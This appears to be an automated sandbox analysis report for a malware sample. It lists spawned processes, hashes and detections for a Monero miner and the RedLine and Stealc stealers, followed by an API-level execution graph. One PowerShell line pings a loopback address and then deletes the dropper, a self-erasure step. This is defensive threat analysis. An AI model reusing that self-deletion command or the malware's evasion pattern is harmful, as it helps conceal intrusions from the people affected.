                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000003.3021212700.000002804F500000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000027.00000003.3021212700.000002804F500000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                                                                                • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: 00000027.00000003.3021212700.000002804F500000.00000004.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                • Detection: 70%, ReversingLabs
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:40
                                                                                                                                                                                                                                                Start time:13:13:28
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:explorer.exe
                                                                                                                                                                                                                                                Imagebase:0x7ff609140000
                                                                                                                                                                                                                                                File size:5'141'208 bytes
                                                                                                                                                                                                                                                MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000028.00000002.3026870349.0000000000847000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000028.00000002.3026870349.000000000086B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000028.00000002.3027829379.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000028.00000002.3028044780.000000014040B000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000028.00000002.3026870349.0000000000895000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:41
                                                                                                                                                                                                                                                Start time:13:13:28
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                                                                                                                                                                                                                                                Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:42
                                                                                                                                                                                                                                                Start time:13:13:28
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:43
                                                                                                                                                                                                                                                Start time:13:13:28
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\PING.EXE
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:"C:\Windows\system32\PING.EXE" 127.1.10.1
                                                                                                                                                                                                                                                Imagebase:0x7ff72c040000
                                                                                                                                                                                                                                                File size:22'528 bytes
                                                                                                                                                                                                                                                MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:45
                                                                                                                                                                                                                                                Start time:13:13:29
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe"
                                                                                                                                                                                                                                                Imagebase:0x110000
                                                                                                                                                                                                                                                File size:4'455'936 bytes
                                                                                                                                                                                                                                                MD5 hash:F8D2B32727EAE3B8B27AB03CA770A941
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                Target ID:46
                                                                                                                                                                                                                                                Start time:13:13:38
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe"
                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                File size:1'979'392 bytes
                                                                                                                                                                                                                                                MD5 hash:341918EFC0EB0FE89609A7486A9ED04A
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000002E.00000002.4037878938.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000002E.00000002.4018196816.0000000000F39000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                Target ID:47
                                                                                                                                                                                                                                                Start time:13:13:47
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe"
                                                                                                                                                                                                                                                Imagebase:0x900000
                                                                                                                                                                                                                                                File size:1'855'488 bytes
                                                                                                                                                                                                                                                MD5 hash:D52E2D9DC21C02FA5F8161754B7B6463
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                Target ID:48
                                                                                                                                                                                                                                                Start time:13:13:57
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe"
                                                                                                                                                                                                                                                Imagebase:0xf20000
                                                                                                                                                                                                                                                File size:2'899'456 bytes
                                                                                                                                                                                                                                                MD5 hash:AD87440D4B97E759F9D4EE9D6279D06E
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000030.00000003.3334314821.0000000004930000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000030.00000002.4222202528.0000000000F21000.00000040.00000001.01000000.00000013.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000030.00000002.4214117571.000000000075E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                Reset < >

                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                  Execution Coverage:6.4%
                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                  Signature Coverage:2.8%
                                                                                                                                                                                                                                                  Total number of Nodes:755
                                                                                                                                                                                                                                                  Total number of Limit Nodes:24
                                                                                                                                                                                                                                                  execution_graph 12459 b287b2 12460 b287b6 12459->12460 12461 b287b8 GetFileAttributesA 12459->12461 12460->12461 12462 b287c4 12461->12462 12939 b28d30 12940 b28d80 12939->12940 12941 b25c10 6 API calls 12940->12941 12942 b28d9a shared_ptr __floor_pentium4 12941->12942 12994 b22170 12997 b3c6fc 12994->12997 12996 b2217a 12998 b3c724 12997->12998 12999 b3c70c 12997->12999 12998->12996 12999->12998 13001 b3cfbe 12999->13001 13002 b3ccd5 __Mtx_init_in_situ InitializeCriticalSectionEx 13001->13002 13003 b3cfd0 13002->13003 13003->12999 13012 b242b0 13015 b23ac0 13012->13015 13014 b242bb shared_ptr 13016 b23af9 13015->13016 13017 b23b39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 13016->13017 13019 b232d0 6 API calls 13016->13019 13020 b23c38 13016->13020 13017->13014 13018 b232d0 6 API calls 13022 b23c5f 13018->13022 13019->13020 13020->13018 13020->13022 13021 b23c68 13021->13014 13022->13021 13023 b23810 4 API calls 13022->13023 13024 b23cdb 13023->13024 13085 b277b0 13086 b277f1 shared_ptr 13085->13086 13087 b25c10 6 API calls 13086->13087 13088 b27883 shared_ptr 13086->13088 13087->13088 13089 b25c10 6 API calls 13088->13089 13090 b27953 shared_ptr __floor_pentium4 13088->13090 13091 b279e3 13089->13091 13092 b25c10 6 API calls 13091->13092 13093 b27a15 shared_ptr 13092->13093 13094 b25c10 6 API calls 13093->13094 13099 b27aa5 shared_ptr __floor_pentium4 13093->13099 13095 b27b7d 13094->13095 13096 b25c10 6 API calls 13095->13096 13097 b27ba0 13096->13097 13098 b25c10 6 API calls 13097->13098 13098->13099 13100 b287b0 13101 b287b6 13100->13101 13102 b287b8 GetFileAttributesA 13100->13102 13101->13102 13103 b287c4 13102->13103 13104 b347b0 13106 b34eed 13104->13106 13105 b34f59 shared_ptr __floor_pentium4 13106->13105 13107 b27d30 7 API calls 13106->13107 13108 b350ed 13107->13108 13143 b28380 13108->13143 13110 b35106 13111 b25c10 6 API calls 13110->13111 13112 b35155 13111->13112 13113 b25c10 6 API calls 13112->13113 13114 b35171 13113->13114 13149 b29a00 13114->13149 13144 b283e5 __cftof 13143->13144 13145 b25c10 6 API calls 13144->13145 13146 b28403 shared_ptr __floor_pentium4 13144->13146 13147 b28427 13145->13147 13146->13110 13148 b25c10 6 API calls 13147->13148 13148->13146 13150 b29a3f 13149->13150 13151 b25c10 6 API calls 13150->13151 13152 b29a47 13151->13152 13153 b28b30 6 API calls 13152->13153 13154 b29a58 13153->13154 13074 b24276 13075 b22410 5 API calls 13074->13075 13076 b2427f 13075->13076 12914 b2a9f4 12925 b29230 12914->12925 12916 b2aa03 shared_ptr 12917 b25c10 6 API calls 12916->12917 12923 b2aab3 shared_ptr 12916->12923 12918 b2aa65 12917->12918 12919 b25c10 6 API calls 12918->12919 12920 b2aa8d 12919->12920 12921 b25c10 6 API calls 12920->12921 12921->12923 12924 b2ad3c shared_ptr __floor_pentium4 12923->12924 12935 b58ab6 12923->12935 12928 b29284 shared_ptr 12925->12928 12926 b25c10 6 API calls 12926->12928 12927 b29543 shared_ptr __floor_pentium4 12927->12916 12928->12926 12933 b2944f shared_ptr 12928->12933 12929 b25c10 6 API calls 12929->12933 12930 b298b5 shared_ptr __floor_pentium4 12930->12916 12931 b2979f shared_ptr 12931->12930 12932 b25c10 6 API calls 12931->12932 12934 b29927 shared_ptr __floor_pentium4 12932->12934 12933->12927 12933->12929 12933->12931 12934->12916 12936 b58ad1 12935->12936 12937 b58868 4 API calls 12936->12937 12938 b58adb 12937->12938 12938->12923 13029 b29ab8 13031 b29acc 13029->13031 13032 b29b08 13031->13032 13033 b2a917 13032->13033 13035 b29b4b shared_ptr 13032->13035 13034 b2a953 Sleep CreateMutexA 13033->13034 13038 b2a98e 13034->13038 13036 b25c10 6 API calls 13035->13036 13037 b29b59 13035->13037 13039 b29b7c 13036->13039 13046 b28b30 13039->13046 13041 b29b8d 13042 b25c10 6 API calls 13041->13042 13043 b29cb1 13042->13043 13044 b28b30 6 API calls 13043->13044 13045 b29cc2 13044->13045 13047 b28b7c 13046->13047 13048 b25c10 6 API calls 13047->13048 13049 b28b97 shared_ptr __floor_pentium4 13048->13049 13049->13041 12463 b2b1a0 12464 b2b1f2 12463->12464 12465 b2b3ad CoInitialize 12464->12465 12466 b2b3fa shared_ptr __floor_pentium4 12465->12466 12711 b220a0 12714 b3c68b 12711->12714 12713 b220ac 12717 b3c3d5 12714->12717 12716 b3c69b 12716->12713 12718 b3c3e1 12717->12718 12719 b3c3eb 12717->12719 12720 b3c39e 12718->12720 12721 b3c3be 12718->12721 12719->12716 12720->12719 12726 b3ccd5 12720->12726 12730 b3cd0a 12721->12730 12724 b3c3d0 12724->12716 12727 b3cce3 InitializeCriticalSectionEx 12726->12727 12728 b3c3b7 12726->12728 12727->12728 12728->12716 12731 b3cd1f RtlInitializeConditionVariable 12730->12731 12731->12724 12946 b24120 12947 b2416a 12946->12947 12949 b241b2 __floor_pentium4 12947->12949 12950 b23ee0 12947->12950 12951 b23f48 12950->12951 12952 b23f1e 12950->12952 12953 b23f58 12951->12953 12956 b22c00 12951->12956 12952->12949 12953->12949 12957 b22c0e 12956->12957 12963 b3b847 12957->12963 12959 b22c42 12960 b22c49 12959->12960 12969 b22c80 12959->12969 12960->12949 12962 b22c58 Concurrency::cancel_current_task 12964 b3b854 12963->12964 12968 b3b873 Concurrency::details::_Reschedule_chore 12963->12968 12972 b3cb77 12964->12972 12966 b3b864 12966->12968 12974 b3b81e 12966->12974 12968->12959 12980 b3b7fb 12969->12980 12971 b22cb2 shared_ptr 12971->12962 12973 b3cb92 CreateThreadpoolWork 12972->12973 12973->12966 12976 b3b827 Concurrency::details::_Reschedule_chore 12974->12976 12978 b3cdcc 12976->12978 12977 b3b841 12977->12968 12979 b3cde1 TpPostWork 12978->12979 12979->12977 12981 b3b807 12980->12981 12982 b3b817 12980->12982 12981->12982 12984 b3ca78 12981->12984 12982->12971 12985 b3ca8d TpReleaseWork 12984->12985 12985->12982 13169 b23fe0 13170 b24022 13169->13170 13171 b240d2 13170->13171 13172 b2408c 13170->13172 13175 b24035 __floor_pentium4 13170->13175 13173 b23ee0 3 API calls 13171->13173 13176 b235e0 13172->13176 13173->13175 13177 b23616 13176->13177 13181 b2364e Concurrency::cancel_current_task shared_ptr __floor_pentium4 13177->13181 13182 b22ce0 13177->13182 13179 b2369e 13180 b22c00 3 API calls 13179->13180 13179->13181 13180->13181 13181->13175 13183 b22d1d 13182->13183 13184 b3bedf InitOnceExecuteOnce 13183->13184 13185 b22d46 13184->13185 13186 b22d51 __floor_pentium4 13185->13186 13187 b22d88 13185->13187 13191 b3bef7 13185->13191 13186->13179 13189 b22440 4 API calls 13187->13189 13190 b22d9b 13189->13190 13190->13179 13192 b3bf03 Concurrency::cancel_current_task 13191->13192 13193 b3bf73 13192->13193 13194 b3bf6a 13192->13194 13195 b22ae0 5 API calls 13193->13195 13198 b3be7f 13194->13198 13197 b3bf6f 13195->13197 13197->13187 13199 b3cc31 InitOnceExecuteOnce 13198->13199 13200 b3be97 13199->13200 13201 b3be9e 13200->13201 13202 b56cbb 4 API calls 13200->13202 13201->13197 13203 b3bea7 13202->13203 13203->13197 13287 b2af20 13288 b2af63 13287->13288 13299 b56660 13288->13299 13293 b5663f 4 API calls 13294 b2af80 13293->13294 13295 b5663f 4 API calls 13294->13295 13296 b2af98 __cftof 13295->13296 13305 b255f0 13296->13305 13298 b2b04e shared_ptr __floor_pentium4 13300 b5a671 __cftof 4 API calls 13299->13300 13301 b2af69 13300->13301 13302 b5663f 13301->13302 13303 b5a671 __cftof 4 API calls 13302->13303 13304 b2af71 13303->13304 13304->13293 13306 b25610 13305->13306 13308 b25710 __floor_pentium4 13306->13308 13309 b222c0 13306->13309 13308->13298 13312 b22280 13309->13312 13313 b22296 13312->13313 13316 b587f8 13313->13316 13319 b57609 13316->13319 13318 b222a4 13318->13306 13320 b57649 13319->13320 13324 b57631 __cftof __floor_pentium4 13319->13324 13321 b5690a __cftof 4 API calls 13320->13321 13320->13324 13322 b57661 13321->13322 13325 b57bc4 13322->13325 13324->13318 13327 b57bd5 13325->13327 13326 b57be4 __cftof 13326->13324 13327->13326 13332 b58168 13327->13332 13337 b57dc2 13327->13337 13342 b57de8 13327->13342 13352 b57f36 13327->13352 13333 b58171 13332->13333 13334 b58178 13332->13334 13361 b57b50 13333->13361 13334->13327 13336 b58177 13336->13327 13338 b57dd2 13337->13338 13339 b57dcb 13337->13339 13338->13327 13340 b57b50 4 API calls 13339->13340 13341 b57dd1 13340->13341 13341->13327 13343 b57e09 __cftof 13342->13343 13345 b57def 13342->13345 13343->13327 13344 b57f69 13350 b57f77 13344->13350 13351 b57f8b 13344->13351 13369 b58241 13344->13369 13345->13343 13345->13344 13347 b57fa2 13345->13347 13345->13350 13347->13351 13365 b58390 13347->13365 13350->13351 13373 b586ea 13350->13373 13351->13327 13353 b57f69 13352->13353 13354 b57f4f 13352->13354 13355 b58241 4 API calls 13353->13355 13359 b57f77 13353->13359 13360 b57f8b 13353->13360 13354->13353 13356 b57fa2 13354->13356 13354->13359 13355->13359 13357 b58390 4 API calls 13356->13357 13356->13360 13357->13359 13358 b586ea 4 API calls 13358->13360 13359->13358 13359->13360 13360->13327 13362 b57b62 13361->13362 13363 b58ab6 4 API calls 13362->13363 13364 b57b85 13363->13364 13364->13336 13367 b583ab 13365->13367 13366 b583dd 13366->13350 13367->13366 13377 b5c88e 13367->13377 13370 b5825a 13369->13370 13384 b5d3c8 13370->13384 13372 b5830d 13372->13350 13372->13372 13374 b5875d __floor_pentium4 13373->13374 13376 b58707 13373->13376 13374->13351 13375 b5c88e __cftof 4 API calls 13375->13376 13376->13374 13376->13375 13380 b5c733 13377->13380 13379 b5c8a6 13379->13366 13381 b5c743 13380->13381 13382 b5c748 __cftof 13381->13382 13383 b5690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 13381->13383 13382->13379 13383->13382 13386 b5d3ee 13384->13386 13396 b5d3d8 __cftof 13384->13396 13385 b5d485 13389 b5d4e4 13385->13389 13390 b5d4ae 13385->13390 13386->13385 13387 b5d48a 13386->13387 13386->13396 13397 b5cbdf 13387->13397 13414 b5cef8 13389->13414 13391 b5d4b3 13390->13391 13392 b5d4cc 13390->13392 13403 b5d23e 13391->13403 13410 b5d0e2 13392->13410 13396->13372 13398 b5cbf1 13397->13398 13399 b5690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 13398->13399 13400 b5cc05 13399->13400 13401 b5cef8 GetPEB ExitProcess GetPEB RtlAllocateHeap 13400->13401 13402 b5cc0d __alldvrm __cftof _strrchr 13400->13402 13401->13402 13402->13396 13404 b5d26c 13403->13404 13405 b5d2de 13404->13405 13407 b5d2b7 13404->13407 13409 b5d2a5 13404->13409 13406 b5cf9a GetPEB ExitProcess GetPEB RtlAllocateHeap 13405->13406 13406->13409 13407->13407 13408 b5d16d GetPEB ExitProcess GetPEB RtlAllocateHeap 13407->13408 13408->13409 13409->13396 13411 b5d10f 13410->13411 13412 b5d14e 13411->13412 13413 b5d16d GetPEB ExitProcess GetPEB RtlAllocateHeap 13411->13413 13412->13396 13413->13412 13415 b5cf10 13414->13415 13416 b5cf75 13415->13416 13417 b5cf9a GetPEB ExitProcess GetPEB RtlAllocateHeap 13415->13417 13416->13396 13417->13416 13155 b29ba5 13156 b29ba7 13155->13156 13157 b25c10 6 API calls 13156->13157 13158 b29cb1 13157->13158 13159 b28b30 6 API calls 13158->13159 13160 b29cc2 13159->13160 12708 b56629 12709 b564c7 __cftof 3 API calls 12708->12709 12710 b5663a 12709->12710 12986 b3d111 12987 b3d122 12986->12987 12988 b3d12a 12987->12988 12990 b3d199 12987->12990 12991 b3d1a7 SleepConditionVariableCS 12990->12991 12993 b3d1c0 12990->12993 12991->12993 12993->12987 13161 b22b90 13162 b22bce 13161->13162 13163 b3b7fb TpReleaseWork 13162->13163 13164 b22bdb shared_ptr __floor_pentium4 13163->13164 13418 b22b10 13419 b22b1a 13418->13419 13420 b22b1c 13418->13420 13421 b3c26a 5 API calls 13420->13421 13422 b22b22 13421->13422 13204 b387d0 13205 b3882a __cftof 13204->13205 13211 b39bb0 13205->13211 13209 b388d9 std::_Throw_future_error 13210 b3886c __floor_pentium4 13224 b39ef0 13211->13224 13213 b39be5 13214 b22ce0 5 API calls 13213->13214 13215 b39c16 13214->13215 13228 b39f70 13215->13228 13217 b38854 13217->13210 13218 b243f0 13217->13218 13219 b3bedf InitOnceExecuteOnce 13218->13219 13220 b2440a 13219->13220 13221 b24411 13220->13221 13222 b56cbb 4 API calls 13220->13222 13221->13209 13223 b24424 13222->13223 13225 b39f0c 13224->13225 13226 b3c68b __Mtx_init_in_situ 2 API calls 13225->13226 13227 b39f17 13226->13227 13227->13213 13229 b39fef shared_ptr 13228->13229 13232 b3a058 13229->13232 13233 b3a210 13229->13233 13231 b3a03b 13231->13217 13234 b3a290 13233->13234 13240 b371d0 13234->13240 13236 b3a2cc shared_ptr 13237 b3a4be shared_ptr 13236->13237 13238 b23ee0 3 API calls 13236->13238 13237->13231 13239 b3a4a6 13238->13239 13239->13231 13241 b37211 13240->13241 13248 b23970 13241->13248 13243 b37446 __floor_pentium4 13243->13236 13244 b372ad __cftof 13244->13243 13245 b3c68b __Mtx_init_in_situ 2 API calls 13244->13245 13246 b37401 13245->13246 13253 b22ec0 13246->13253 13249 b3c68b __Mtx_init_in_situ 2 API calls 13248->13249 13250 b239a7 13249->13250 13251 b3c68b __Mtx_init_in_situ 2 API calls 13250->13251 13252 b239e6 13251->13252 13252->13244 13254 b22f06 13253->13254 13258 b22f6f 13253->13258 13255 b3c6ac GetSystemTimePreciseAsFileTime 13254->13255 13256 b22f12 13255->13256 13259 b2301e 13256->13259 13262 b22f1d __Mtx_unlock 13256->13262 13257 b22fef 13257->13243 13258->13257 13265 b3c6ac GetSystemTimePreciseAsFileTime 13258->13265 13260 b3c26a 5 API calls 13259->13260 13261 b23024 13260->13261 13263 b3c26a 5 API calls 13261->13263 13262->13258 13262->13261 13264 b22fb9 13263->13264 13266 b3c26a 5 API calls 13264->13266 13267 b22fc0 __Mtx_unlock 13264->13267 13265->13264 13266->13267 13268 b3c26a 5 API calls 13267->13268 13269 b22fd8 __Cnd_broadcast 13267->13269 13268->13269 13269->13257 13270 b3c26a 5 API calls 13269->13270 13271 b2303c 13270->13271 13272 b3c6ac GetSystemTimePreciseAsFileTime 13271->13272 13283 b23080 shared_ptr __Mtx_unlock 13272->13283 13273 b231c5 13274 b3c26a 5 API calls 13273->13274 13275 b231cb 13274->13275 13276 b3c26a 5 API calls 13275->13276 13277 b231d1 13276->13277 13278 b3c26a 5 API calls 13277->13278 13279 b23193 __Mtx_unlock 13278->13279 13280 b3c26a 5 API calls 13279->13280 13281 b231a7 __floor_pentium4 13279->13281 13282 b231dd 13280->13282 13281->13243 13283->13273 13283->13275 13283->13281 13284 b3c6ac GetSystemTimePreciseAsFileTime 13283->13284 13285 b2315f 13284->13285 13285->13273 13285->13277 13285->13279 13286 b3bd4c GetSystemTimePreciseAsFileTime 13285->13286 13286->13285 12606 b2a856 12607 b2a892 shared_ptr 12606->12607 12608 b2a870 12606->12608 12613 b2a8a0 12607->12613 12622 b27d30 12607->12622 12608->12607 12609 b2a94e 12608->12609 12612 b2a953 Sleep CreateMutexA 12609->12612 12611 b2a8ae 12611->12613 12615 b27d30 7 API calls 12611->12615 12614 b2a98e 12612->12614 12616 b2a8b8 12615->12616 12616->12613 12617 b27d30 7 API calls 12616->12617 12618 b2a8c2 12617->12618 12618->12613 12619 b27d30 7 API calls 12618->12619 12620 b2a8cc 12619->12620 12620->12613 12621 b27d30 7 API calls 12620->12621 12621->12613 12623 b27d96 __cftof 12622->12623 12642 b27ee8 shared_ptr __floor_pentium4 12623->12642 12661 b25c10 12623->12661 12625 b27dd2 12626 b25c10 6 API calls 12625->12626 12628 b27dff shared_ptr 12626->12628 12627 b27ed3 GetNativeSystemInfo 12629 b27ed7 12627->12629 12628->12627 12628->12629 12628->12642 12630 b28019 12629->12630 12631 b27f3f 12629->12631 12629->12642 12633 b25c10 6 API calls 12630->12633 12632 b25c10 6 API calls 12631->12632 12635 b27f67 12632->12635 12634 b2804c 12633->12634 12636 b25c10 6 API calls 12634->12636 12637 b25c10 6 API calls 12635->12637 12639 b2806b 12636->12639 12638 b27f86 12637->12638 12671 b58bbe 12638->12671 12641 b25c10 6 API calls 12639->12641 12643 b280a3 12641->12643 12642->12611 12644 b25c10 6 API calls 12643->12644 12645 b280f4 12644->12645 12646 b25c10 6 API calls 12645->12646 12647 b28113 12646->12647 12648 b25c10 6 API calls 12647->12648 12649 b2814b 12648->12649 12650 b25c10 6 API calls 12649->12650 12651 b2819c 12650->12651 12652 b25c10 6 API calls 12651->12652 12653 b281bb 12652->12653 12654 b25c10 6 API calls 12653->12654 12655 b281f3 12654->12655 12656 b25c10 6 API calls 12655->12656 12657 b28244 12656->12657 12658 b25c10 6 API calls 12657->12658 12659 b28263 12658->12659 12660 b25c10 6 API calls 12659->12660 12660->12642 12662 b25c54 12661->12662 12674 b24b30 12662->12674 12664 b25d17 shared_ptr __floor_pentium4 12664->12625 12665 b25c7b __cftof 12665->12664 12666 b25da7 RegOpenKeyExA 12665->12666 12667 b25e00 RegCloseKey 12666->12667 12669 b25e26 12667->12669 12668 b25ea6 shared_ptr __floor_pentium4 12668->12625 12669->12668 12670 b25c10 4 API calls 12669->12670 12702 b58868 12671->12702 12673 b58bdc 12673->12642 12676 b24ce5 12674->12676 12677 b24b92 12674->12677 12676->12665 12677->12676 12678 b56da6 12677->12678 12679 b56db4 12678->12679 12680 b56dc2 __fassign 12678->12680 12683 b56d19 12679->12683 12680->12677 12684 b5690a __cftof 4 API calls 12683->12684 12685 b56d2c 12684->12685 12688 b56d52 12685->12688 12687 b56d3d 12687->12677 12689 b56d8f 12688->12689 12690 b56d5f 12688->12690 12691 b5b67d 4 API calls 12689->12691 12692 b56d6e __fassign 12690->12692 12694 b5b6a1 12690->12694 12691->12692 12692->12687 12695 b5690a __cftof 4 API calls 12694->12695 12697 b5b6be 12695->12697 12696 b5b6ce __floor_pentium4 12696->12692 12697->12696 12699 b5f1bf 12697->12699 12700 b5690a __cftof 4 API calls 12699->12700 12701 b5f1df __cftof __fassign __freea __floor_pentium4 12700->12701 12701->12696 12703 b5887a 12702->12703 12704 b5690a __cftof 4 API calls 12703->12704 12707 b5888f __cftof 12703->12707 12706 b588bf 12704->12706 12705 b56d52 4 API calls 12705->12706 12706->12705 12706->12707 12707->12673 13004 b2215a 13005 b3c6fc InitializeCriticalSectionEx 13004->13005 13006 b22164 13005->13006 13165 b23f9f 13166 b23fb6 13165->13166 13167 b23fad 13165->13167 13168 b22410 5 API calls 13167->13168 13168->13166 13055 b29adc 13058 b29aea shared_ptr 13055->13058 13056 b2a917 13057 b2a953 Sleep CreateMutexA 